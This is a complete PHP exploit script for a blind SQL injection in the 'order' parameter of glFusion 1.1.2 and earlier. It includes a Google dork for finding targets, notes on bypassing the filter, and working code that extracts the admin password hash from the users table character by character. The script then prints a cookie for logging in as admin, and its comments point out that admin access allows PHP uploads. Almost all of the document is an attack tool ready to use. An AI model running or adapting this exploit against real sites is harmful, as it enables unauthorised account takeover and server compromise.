glFusion <= 1.1.2 COM_applyFilter()/order SQL Injection Exploit

<?php /* glFusion <= 1.1.2 COM_applyFilter()/order sql injection exploit by Nine:Situations:Group::bookoo working against Mysql >= 4.1 php.ini independent our site: http://retrogod.altervista.org/ software site: http://www.glfusion.org/ google dork: \"Page created in\" \"seconds by glFusion\" +RSS Vulnerability, sql injection in \'order\' and \'direction\' arguments: look ExecuteQueries() function in /private/system/classes/listfactory.class.php, near line 336: ... // Get the details for sorting the list $this->_sort_arr[\'field\'] = isset($_REQUEST[\'order\']) ? COM_applyFilter($_REQUEST[\'order\']) : $this->_def_sort_arr[\'field\']; $this->_sort_arr[\'direction\'] = isset($_REQUEST[\'direction\']) ? COM_applyFilter($_REQUEST[\'direction\']) : $this->_def_sort_arr[\'direction\']; if (is_numeric($this->_sort_arr[\'field\'])) { $ord = $this->_def_sort_arr[\'field\']; $this->_sort_arr[\'field\'] = SQL_TITLE; } else { $ord = $this->_sort_arr[\'field\']; } $order_sql = \' ORDER BY \' . $ord . \' \' . strtoupper($this->_sort_arr[\'direction\']); ... filters are inefficient, see COM_applyFilter() which calls COM_applyBasicFilter() in /public/lib-common.php near line 5774. We are in an ORDER clause and vars are not surrounded by quotes, bad chars are ex. \",\" , \"/\" ,\"\'\", \";\", \"\\\",\"\"\",\"*\",\"`\" but what about spaces and \"(\"... you can use a CASE WHEN .. THEN .. ELSE .. END construct instead of ex. IF(..,..,..) and \"--\" instead of \"/*\" to close your query. And ex. the alternative syntax SUBSTR(str FROM n FOR n) instead of SUBSTR(str,n,n) in a sub-SELECT statement. Other attacks are possible, COM_applyFilter() is a very common used one. Additional notes: \'direction\' argument is uppercased by strtoupper(), you know that table identifiers on Unix-like systems are case sensitives but not on MS Windows, however I choosed to inject in the \'order\' one for better results. Vars come from the $_REQUEST[] array so you can pass it by $_POST[] or $_COOKIE[], which is not intended I suppose. This exploit extracts the hash from users table; also note that you do not need to crack the hash, you can authenticate as admin with the cookie: glfusion=[uid]; glf_password=[hash]; as admin you can upload php files in public folders! Very soft mitigations: glFusion does not show the table prefix in sql errors, default however is \'gl_\'. I prepared a fast routine to extract it from information_schema db if availiable. To successfully interrogate MySQL you need at least 2 records in the same topic section, however the default installation create 2 links with topic \"glFusion\" */ $err[0]=\"[!] This script is intended to be launched from the cli!\"; $err[1]=\"[!] You need the curl extesion loaded!\"; if (php_sapi_name() <> \"cli\") { die($err[0]); } if (!extension_loaded(\'curl\')) { $win = (strtoupper(substr(PHP_OS, 0, 3)) === \'WIN\') ? true : false; if ($win) { !dl(\"php_curl.dll\") ? die($err[1]) : nil; } else { !dl(\"php_curl.so\") ? die($err[1]) : nil; } } function syntax(){ print ( \"Syntax: php \".$argv[0].\" [host] [path] [[port]] [OPTIONS] \\n\". \"Options: \\n\". \"--port:[port] - specify a port \\n\". \" default -> 80 \\n\". \"--prefix - try to extract table prefix from information.schema\\n\". \" default -> gl_ \\n\". \"--uid:[n] - specify an uid other than default (2,usually admin)\\n\". \"--proxy:[host:port] - use proxy \\n\". \"--enforce - try even with \'not vulnerable\' message \"); die(); } error_reporting(E_ALL ^ E_NOTICE); $host=$argv[1]; $path=$argv[2]; $prefix=\"gl_\"; //default $uid=\"2\"; $where= \"uid=$uid\"; //user id, usually admin, anonymous = 1 $argv[2] ? print(\"[*] Attacking...\\n\") : syntax(); $_f_prefix=false; $_use_proxy=false; $port=80; $_enforce=false; for ($i=3; $i<$argc; $i++){ if ( stristr($argv[$i],\"--prefix\")){ $_f_prefix=true; } if ( stristr($argv[$i],\"--proxy:\")){ $_use_proxy=true; $tmp=explode(\":\",$argv[$i]); $proxy_host=$tmp[1]; $proxy_port=(int)$tmp[2]; } if ( stristr($argv[$i],\"--port:\")){ $tmp=explode(\":\",$argv[$i]); $port=(int)$tmp[1]; } if ( stristr($argv[$i],\"--enforce\")){ $_enforce=true; } if ( stristr($argv[$i],\"--uid\")){ $tmp=explode(\":\",$argv[$i]); $uid=(int)$tmp[1]; $where=\"uid=$uid\"; } } $url = \"http://$argv[1]:$port\"; function _s($url,$request) { global $_use_proxy,$proxy_host,$proxy_port; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL,$url); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $request.\"\\r\\n\"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_USERAGENT, \"Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7\"); curl_setopt($ch, CURLOPT_TIMEOUT, 0); curl_setopt($ch, CURLOPT_HEADER, 0); if ($_use_proxy){ curl_setopt($ch, CURLOPT_PROXY, $proxy_host.\":\".$proxy_port); } $_d = curl_exec($ch); if (curl_errno($ch)) { die(\"[!] \".curl_error($ch).\"\\n\"); } else { curl_close($ch); } return $_d; } function chk_err($s){ if (stripos ($s,\"\\x41\\x6e\\x20\\x53\\x51\\x4c\\x20\\x65\\x72\\x72\\x6f\\x72\\x20\\x68\\x61\\x73\\x20\\x6f\\x63\\x63\\x75\\x72\\x72\\x65\\x64\")){ return true; } else { return false; } } function xtrct_tpc($_h){ $_x=explode(\"\\x69\\x6e\\x64\\x65\\x78\\x2e\\x70\\x68\\x70\\x3f\\x74\\x6f\\x70\\x69\\x63\\x3d\",$_h); $_y=array(); for ($i=1; $i<count($_x); $i++){ $_tmp=explode(\"\\x22\",$_x[$i]); if ((!in_array($_tmp[0],$_y)) and ($_tmp[0]<>\'\')) { $_y[$i]=$_tmp[0]; } } return $_y; } $url =\"http://$host:$port\".$path.\"index.php\"; $out= _s($url,\"\"); $_tpcs=xtrct_tpc($out); $_types=array(\"links\",\"stories\",\"filemgmt\",\"forum\"); $_t=false; for ($i=0; $i<count($_tpcs); $i++){ for ($j=0; $j<count($_types); $j++){ $url =\"http://$host:$port\".$path.\"search.php?query=a+a+a&keyType=all&datestart=&dateend=&topic=\".$_tpcs[$i].\"&type=\".$_types[$j].\"&author=0&results=25&mode=search\"; $out= _s($url,\"\"); $mtchs=explode(\"\\x3e\\x32\\x2e\", $out); if (count($mtchs)==2){ $_t=true; break; } } } if ($_t==true){ $type = $_types[$j]; $topic= $_tpcs[$i]; } else { $type= \"links\"; //section with at least 2 records of the same topic $topic= \"glFusion\"; //existing topic in section } print(\"[*] topic -> \'\".$topic.\"\', type -> \'\".$type.\"\'\\n\"); $prepend=\"query=&topic=\".$topic.\"&keyType=phrase\"; //checking for vulnerability existence ... $url =\"http://$host:$port\".$path.\"search.php?\".$prepend.\"&datestart=&dateend=1&type=all&author=0&results=25&mode=search&order=\"; $_d=\"order=--;\"; $out= _s($url,$_d); //version compatibility if (stripos($out,\"\\x73\\x68\\x6f\\x75\\x6c\\x64\\x20\\x68\\x61\\x76\\x65\\x20\\x61\\x74\\x20\\x6c\\x65\\x61\\x73\\x74\\x20\\x33\\x20\\x63\\x68\\x61\\x72\\x61\\x63\\x74\\x65\\x72\\x73\")){ $prepend=\"query=a+a+a&topic=0&keyType=all\"; $url =\"http://$host:$port\".$path.\"search.php?\".$prepend.\"&datestart=&dateend=1&type=all&author=0&results=25&mode=search\"; $out= _s($url,$_d); } if (chk_err($out)) { print(\"[*] Vulnerable ...\\n\"); } else { print(\"[!] Not vulnerable ...\\n\"); if (!$_enforce){ die; } } switch ($type) { case $_types[0]: $_order = array(\"id\",\"url\",\"description\",\"title\",\"hits\",\"date\",\"uid\"); break; case $_types[1]: $_order = array(\"id\",\"title\",\"description\",\"date\",\"uid\",\"hits\",\"url\"); break; case $_types[2]: $_order = array(\"id\",\"uid\",\"comments\",\"hits\",\"date\",\"description\",\"url\"); break; case $_types[3]: $_order = array(\"id\",\"name\",\"forum\",\"date\",\"title\",\"description\",\"hits\",\"uid\"); break; } function xtrct_lnk($_h){ $_x=explode(\"\\x3e\\x31\\x2e\",$_h); $_x=explode(\"\\x3c\\x61\\x20\\x68\\x72\\x65\\x66\\x3d\\x22\",$_x[1]); $_x=explode(\"\\x22\",$_x[1]); return html_entity_decode($_x[0]); } //checking for exploitability ... $sql = urlencode(\"(CASE WHEN (SELECT 1) THEN 1 ELSE 1 END) LIMIT 1--\"); $url =\"http://$host:$port\".$path.\"search.php?\".$prepend.\"&datestart=&dateend=1&type=\".$type.\"&author=0&results=25&mode=search\"; $_d=\"order=\".$sql.\";\"; $out= _s($url,$_d); if (chk_err($out)) { die(\"[!] Mysql < 4.1 ...\"); } else { print \"[*] Subquery works, exploiting ...\\n\"; } $_lnks = array(); $v = array(); for ($i=0; $i<count($_order); $i++){ $sql = urlencode(\"$_order[$i] LIMIT 1--\"); $url =\"http://$host:$port\".$path.\"search.php?\".$prepend.\"&datestart=&dateend=1&type=\".$type.\"&author=0&results=25&mode=search\"; $_d=\"order=\".$sql.\";\"; $_o= _s($url,$_d); $l=xtrct_lnk($_o); if (!in_array($l,$_lnks)) { array_push($_lnks,$l); array_push($v,$_order[$i]); } if (count($v)>1) { print \"[*] \'\".$v[0].\"\' and \'\".$v[1].\"\' in ORDER clause returs different records, good! \\n\"; break; } } if (count($v)<=1) {die(\"[!] Unable to interrogate database: \".count(v).\" record(s) in table ... need at least 2 with topic \'\".$topic.\" in section \'\".$type.\"\' !\");} function find_prefix(){ global $_lnks ,$v, $type, $host, $port, $path, $prepend; $_table_name=\"\"; $j=1; print \"[*] Table name -> \"; while (!strstr($_table_name,chr(0))){ $mn=0x00;$mx=0xff; while (1){ if (($mx + $mn) % 2 ==1){ $c= round(($mx + $mn) / 2) - 1; } else { $c= round(($mx + $mn) / 2); } $sql = urlencode(\"(CASE WHEN (SELECT (ASCII(SUBSTR(TABLE_NAME FROM $j FOR 1)) >= \".$c.\") FROM information_schema.TABLES WHERE TABLE_NAME LIKE 0x25747261636b6261636b636f646573 LIMIT 1) THEN \".$v[0].\" ELSE \".$v[1].\" END) LIMIT 1--\"); $url =\"http://$host:$port\".$path.\"search.php?\".$prepend.\"&datestart=&dateend=1&type=\".$type.\"&author=0&results=25&mode=search\"; $_d=\"order=\".$sql.\";\"; $_o= _s($url,$_d); if (chk_err($_o)) { die(\"\\n[!] information_schema not availiable!\"); } $l=xtrct_lnk($_o); if ($l==$_lnks[0]){ $mn = $c; } else { $mx = $c - 1; } if (($mx-$mn==1) or ($mx==$mn)){ $sql = urlencode(\"(CASE WHEN (SELECT (ASCII(SUBSTR(TABLE_NAME FROM $j FOR 1)) = \".$mn.\") FROM information_schema.tables WHERE TABLE_NAME LIKE 0x25747261636b6261636b636f646573 LIMIT 1) THEN \".$v[0].\" ELSE \".$v[1].\" END) LIMIT 1--\"); $url =\"http://$host:$port\".$path.\"search.php?\".$prepend.\"&datestart=&dateend=1&type=\".$type.\"&author=0&results=25&mode=search\"; $_d=\"order=\".$sql.\";\"; $_o= _s($url,$_d); $l=xtrct_lnk($_o); if ($l==$_lnks[0]){ print chr($mn); $_table_name.=chr($mn); } else { print chr($mx); $_table_name.=chr($mx); } break; } } $j++; } print \"\\n\"; $_prefix = str_replace(\"trackbackcodes\",\"\",$_table_name); return $_prefix; } if ($_f_prefix == true) { $prefix=find_prefix(); print \"[*] Table prefix -> \".$prefix.\"\\n\"; } $c=array();$c=array_merge($c,range(0x30,0x39));$c=array_merge($c,range(0x61,0x66)); print \"[*] hash -> \"; $_hash=\"\"; for ($j=1; $j<0x21; $j++){ for ($i=1; $i<=0xff; $i++){ $f=false; if (in_array($i,$c)){ $sql = urlencode(\"(CASE WHEN (SELECT (ASCII(SUBSTR(PASSWD FROM $j FOR 1))=$i) FROM \".$prefix.\"users WHERE $where LIMIT 1) THEN \".$v[0].\" ELSE \".$v[1].\" END) LIMIT 1--\"); $url =\"http://$host:$port\".$path.\"search.php?\".$prepend.\"&datestart=&dateend=1&type=\".$type.\"&author=0&results=25&mode=search\"; $_d=\"order=\".$sql.\";\"; $_o= _s($url,$_d); if (chk_err($_o)) { die(\"\\n[!] wrong table prefix!\"); } $l=xtrct_lnk($_o); if ($l==$_lnks[0]){ $f=true; $_hash.=chr($i); print chr($i); break; } } } if ($f==false){ die(\"\\n[!] Unknown error ...\"); } } print \"\\n[*] your cookie -> glfusion=\".$uid.\"; glf_password=\".$_hash.\"; glf_theme=nouveau;\"; ?>